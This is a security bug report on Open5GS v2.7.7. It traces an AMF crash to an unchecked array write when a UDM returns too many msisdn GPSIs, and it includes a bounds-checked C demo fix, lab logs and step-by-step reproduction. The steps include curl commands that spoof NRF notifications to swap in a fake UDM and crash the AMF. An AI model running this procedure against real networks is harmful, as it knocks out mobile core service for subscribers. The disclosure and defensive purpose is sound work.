### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF crashes during a real UE registration flow when the `Nudm_SDM` `am-data`
response contains too many `gpsis` entries of type `msisdn-*`.
This path is UE-driven: the crash is only reached after an external UE starts a
normal 5G registration procedure and AMF issues:
```text
GET /nudm-sdm/v2/{supi}/am-data
```
inside `amf_nudm_sdm_handle_provisioned()`.
The root cause is a fixed-size array overflow in the AMF-side UDM response
parser:
```c
if (gpsiList) {
    OpenAPI_list_for_each(gpsiList, node) {
        ...
        if (strncmp(gpsi, OGS_ID_GPSI_TYPE_MSISDN,
                    strlen(OGS_ID_GPSI_TYPE_MSISDN)) == 0) {
            amf_ue->msisdn[amf_ue->num_of_msisdn] =
                ogs_id_get_value(node->data);
            ogs_assert(amf_ue->msisdn[amf_ue->num_of_msisdn]);
            amf_ue->num_of_msisdn++;
        }
    }
}
```
at `../src/amf/nudm-handler.c:55-69`.
The destination array only has capacity `OGS_MAX_NUM_OF_MSISDN == 2`:
```c
#define OGS_MAX_NUM_OF_MSISDN 2
```
at `../lib/proto/types.h:876-880`.
There is no bounds check before incrementing `amf_ue->num_of_msisdn`, so an
oversized `gpsis` list corrupts adjacent AMF UE state during registration. In
the confirmed run, the corruption manifested immediately afterwards as bogus
PLMN values in `No Allowed-NSSAI` diagnostics, followed by an AMF segmentation
fault.
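The bounds check described above, as an added example that is not Open5GS code: a self-contained C model of the same loop with a capacity-2 array, local stand-ins for `OGS_MAX_NUM_OF_MSISDN`, `OGS_ID_GPSI_TYPE_MSISDN` and `ogs_id_get_value()` (assumed to match the real definitions only in shape), and a canary field standing in for whatever UE state follows the array in `amf_ue_t`. The hardened loop stops storing at the array capacity and reports how many entries it dropped, so a constructed 16-entry `msisdn-*` list like the one in the malicious run leaves the count at 2 and the canary untouched.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Local stand-ins for the Open5GS definitions named in the report (assumption:
 * the real ones live in lib/proto/types.h and the core id helpers; these copies
 * only make the demo self-contained). */
#define OGS_MAX_NUM_OF_MSISDN   2
#define OGS_ID_GPSI_TYPE_MSISDN "msisdn"
#define DEMO_CANARY             0x5a5a5a5a

/* Minimal model of the slice of amf_ue_t the loop writes to. The canary stands
 * in for the adjacent UE state that an unchecked write would clobber. */
typedef struct {
    char *msisdn[OGS_MAX_NUM_OF_MSISDN];
    int   num_of_msisdn;
    int   canary;
} demo_amf_ue_t;

/* Heap copy of the text after the first '-' ("msisdn-123" -> "123"), or NULL
 * if the id is not in "type-value" form. Stand-in for ogs_id_get_value(). */
static char *demo_id_get_value(const char *id)
{
    const char *dash = strchr(id, '-');
    if (dash == NULL || dash[1] == '\0')
        return NULL;
    size_t len = strlen(dash + 1);
    char *out = malloc(len + 1);
    if (out != NULL)
        memcpy(out, dash + 1, len + 1);
    return out;
}

/* Hardened form of the nudm-handler.c loop: stores at most OGS_MAX_NUM_OF_MSISDN
 * msisdn-* GPSIs and returns how many were dropped, so the caller can log it
 * or reject the subscription data instead of writing past the array. */
int demo_parse_gpsis(demo_amf_ue_t *ue, const char *const *gpsis, size_t n)
{
    int dropped = 0;
    size_t prefix = strlen(OGS_ID_GPSI_TYPE_MSISDN);

    ue->num_of_msisdn = 0;
    for (size_t i = 0; i < n; i++) {
        if (strncmp(gpsis[i], OGS_ID_GPSI_TYPE_MSISDN, prefix) != 0)
            continue;                 /* extid-* and other types are ignored */
        if (ue->num_of_msisdn >= OGS_MAX_NUM_OF_MSISDN) {
            dropped++;                /* the bounds check the report says is missing */
            continue;
        }
        char *value = demo_id_get_value(gpsis[i]);
        if (value == NULL) {
            dropped++;                /* malformed id: neither stored nor asserted on */
            continue;
        }
        ue->msisdn[ue->num_of_msisdn++] = value;
    }
    return dropped;
}

static void demo_free(demo_amf_ue_t *ue)
{
    for (int i = 0; i < ue->num_of_msisdn; i++)
        free(ue->msisdn[i]);
    ue->num_of_msisdn = 0;
}

/* Constructed 16-entry msisdn-* list, the size used in the malicious run.
 * Returns the dropped count (14) if the array was capped at 2 and the canary
 * is intact, otherwise -1. */
int demo_oversized_list(void)
{
    char bufs[16][32];
    const char *list[16];
    for (int i = 0; i < 16; i++) {
        snprintf(bufs[i], sizeof bufs[i], "msisdn-%010d", 1000000000 + i);
        list[i] = bufs[i];
    }
    demo_amf_ue_t ue = { {0}, 0, DEMO_CANARY };
    int dropped = demo_parse_gpsis(&ue, list, 16);
    int ok = (ue.num_of_msisdn == OGS_MAX_NUM_OF_MSISDN && ue.canary == DEMO_CANARY);
    demo_free(&ue);
    return ok ? dropped : -1;
}

/* Constructed normal am-data: one MSISDN plus one external id. Returns the
 * number of stored MSISDNs (1) when nothing was dropped, otherwise -1. */
int demo_normal_list(void)
{
    const char *list[] = { "msisdn-1234567891", "extid-user@example.com" };
    demo_amf_ue_t ue = { {0}, 0, DEMO_CANARY };
    int dropped = demo_parse_gpsis(&ue, list, 2);
    int stored = ue.num_of_msisdn;
    int ok = (dropped == 0 && ue.canary == DEMO_CANARY &&
              strcmp(ue.msisdn[0], "1234567891") == 0);
    demo_free(&ue);
    return ok ? stored : -1;
}

int main(void)
{
    printf("normal list: stored %d\n", demo_normal_list());
    printf("oversized list: dropped %d\n", demo_oversized_list());
    return 0;
}
```

Whether to silently cap or to fail the registration is a policy choice for the AMF; returning the dropped count lets the caller log the event, and an AMF log line saying that a UDM returned more `gpsis` than the UE context can hold is also a useful detection signal for a misbehaving or substituted UDM.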
This is not a duplicate of the existing AMF reports under `report/amf/`: it is
a different entry chain, different trust boundary, and different root-cause
site from the already documented `namf-comm`, `namf-callback`, and `nnrf-*`
issues.
### Root cause
- Entry chain:
  external UE registration
  -> AMF `PUT /nudm-uecm/.../amf-3gpp-access`
  -> AMF `GET /nudm-sdm/v2/{supi}/am-data`
  -> `amf_nudm_sdm_handle_provisioned()`
- Root-cause site: `../src/amf/nudm-handler.c:55-69`
- Fixed target: `../lib/proto/types.h:876-880`
- Root cause family: fixed-size array overflow / out-of-bounds write
- Controlling field: `AccessAndMobilitySubscriptionData.gpsis`
### Steps to Reproduce
1. Start the Open5GS Docker lab and ensure these containers are running:
```bash
docker start db ausf udm udr pcf smf upf amf nssf
```
2. Confirm the subscriber exists in MongoDB. In my live run, the existing test
subscriber was:
```text
IMSI: 001011234567891
```
3. Start a real gNB and UE with the bundled UERANSIM configs:
```bash
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
4. Start the fake UDM helper on the host:
```bash
node /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.js
```
5. Replace the real UDM in AMF's local cache with the fake UDM:
```bash
AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf)
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/4568f3be-3644-41f1-bff0-3b335fd843b5"}'
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST "http://$AMF_IP/nnrf-nfm/v1/nf-status-notify" \
-H 'content-type: application/json' \
--data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.1:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.1"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.1","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
```
6. Control experiment: configure the fake UDM for a single normal `gpsi`, then
restart the UE and wait for successful registration:
```bash
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-ue
docker logs --tail 60 amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' amf
```
In my live run, the fake UDM received the full UDM sequence and the UE reached
successful registration plus PDU session establishment.
7. Malicious experiment: change only the fake UDM mode so `am-data` returns
`16` `msisdn-*` `gpsis`, then restart the UE again:
```bash
printf 'am-data-gpsi-overflow\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker restart amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 120 amf
```
### Logs
Control UE result:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
```
Control AMF state:
```text
running 0
```
Container state after the malicious response:
```text
exited 139 2026-04-12T14:58:46.341705986Z
```
AMF logs:
```text
04/12 14:58:28.440: [sbi] INFO: Setup NF EndPoint(fqdn) [udm.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 14:58:28.440: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.14:80] (../lib/sbi/context.c:2111)
04/12 14:58:45.677: [sbi] INFO: [28259240-367f-41f1-862a-81de7e8f7ca7] (NRF-notify) NF_DEREGISTERED event [type:UDM] (../lib/sbi/nnrf-handler.c:1186)
04/12 14:58:45.694: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF registered (../lib/sbi/nnrf-handler.c:1154)
04/12 14:58:45.694: [sbi] INFO: [fake-udm-amf] (NRF-notify) NF Profile updated [type:UDM] (../lib/sbi/nnrf-handler.c:1168)
04/12 14:58:45.694: [sbi] INFO: [UDM] NFInstance associated [fake-udm-amf] (../lib/sbi/context.c:2441)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(fqdn) [fake-udm-amf.local:0] (../lib/sbi/context.c:2446)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:80] (../lib/sbi/context.c:2446)
04/12 14:58:45.694: [sbi] INFO: [nudm-ueau] NFService associated [fake-udm-ueau] (../lib/sbi/context.c:2109)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 14:58:45.694: [sbi] INFO: [nudm-uecm] NFService associated [fake-udm-uecm] (../lib/sbi/context.c:2109)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 14:58:45.694: [sbi] INFO: [nudm-sdm] NFService associated [fake-udm-sdm] (../lib/sbi/context.c:2109)
04/12 14:58:45.694: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.13:18083] (../lib/sbi/context.c:2111)
04/12 14:58:45.929: [amf] INFO: gNB-N2 accepted[10.33.33.8]:60213 in ng-path module (../src/amf/ngap-sctp.c:113)
04/12 14:58:45.929: [amf] INFO: gNB-N2 accepted[10.33.33.8] in master_sm module (../src/amf/amf-sm.c:953)
04/12 14:58:45.939: [amf] INFO: [Added] Number of gNBs is now 1 (../src/amf/context.c:1277)
04/12 14:58:45.939: [amf] INFO: gNB-N2[10.33.33.8] max_num_of_ostreams : 10 (../src/amf/amf-sm.c:1000)
04/12 14:58:46.161: [amf] INFO: InitialUEMessage (../src/amf/ngap-handler.c:461)
04/12 14:58:46.161: [amf] INFO: [Added] Number of gNB-UEs is now 1 (../src/amf/context.c:2777)
04/12 14:58:46.161: [amf] INFO: RAN_UE_NGAP_ID[1] AMF_UE_NGAP_ID[1] TAC[1] CellID[0x10] (../src/amf/ngap-handler.c:622)
04/12 14:58:46.161: [amf] INFO: [suci-0-001-01-0000-0-0-1234567891] Unknown UE by SUCI (../src/amf/context.c:1912)
04/12 14:58:46.161: [amf] INFO: [Added] Number of AMF-UEs is now 1 (../src/amf/context.c:1688)
04/12 14:58:46.161: [gmm] INFO: Registration request (../src/amf/gmm-sm.c:1670)
04/12 14:58:46.161: [gmm] INFO: [suci-0-001-01-0000-0-0-1234567891] SUCI (../src/amf/gmm-handler.c:183)
04/12 14:58:46.161: [sbi] INFO: [454c6e9c-3644-41f1-a93f-e1505117bc41] Setup NF Instance [type:AUSF] (../lib/sbi/path.c:307)
04/12 14:58:46.167: [amf] INFO: Setup NF EndPoint(fqdn) [ausf.open5gs.org:0] (../src/amf/nausf-handler.c:130)
04/12 14:58:46.167: [amf] INFO: Setup NF EndPoint(addr) [10.33.33.4:80] (../src/amf/nausf-handler.c:130)
04/12 14:58:46.171: [sbi] INFO: [fake-udm-amf] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 14:58:46.173: [sbi] INFO: [fake-udm-amf] Setup NF Instance [type:UDM] (../lib/sbi/path.c:307)
04/12 14:58:46.175: [amf] ERROR: No Allowed-NSSAI (../src/amf/context.c:3044)
04/12 14:58:46.175: [amf] ERROR: Number of Subscribed S-NSSAI [1] (../src/amf/context.c:3045)
04/12 14:58:46.175: [amf] ERROR: Default S_NSSAI[SST:1 SD:0x1] (../src/amf/context.c:3050)
04/12 14:58:46.175: [amf] ERROR: Number of Requested NSSAI [1] (../src/amf/context.c:3059)
04/12 14:58:46.175: [amf] ERROR: PLMN_ID[MCC:12 MNC:645] (../src/amf/context.c:306
```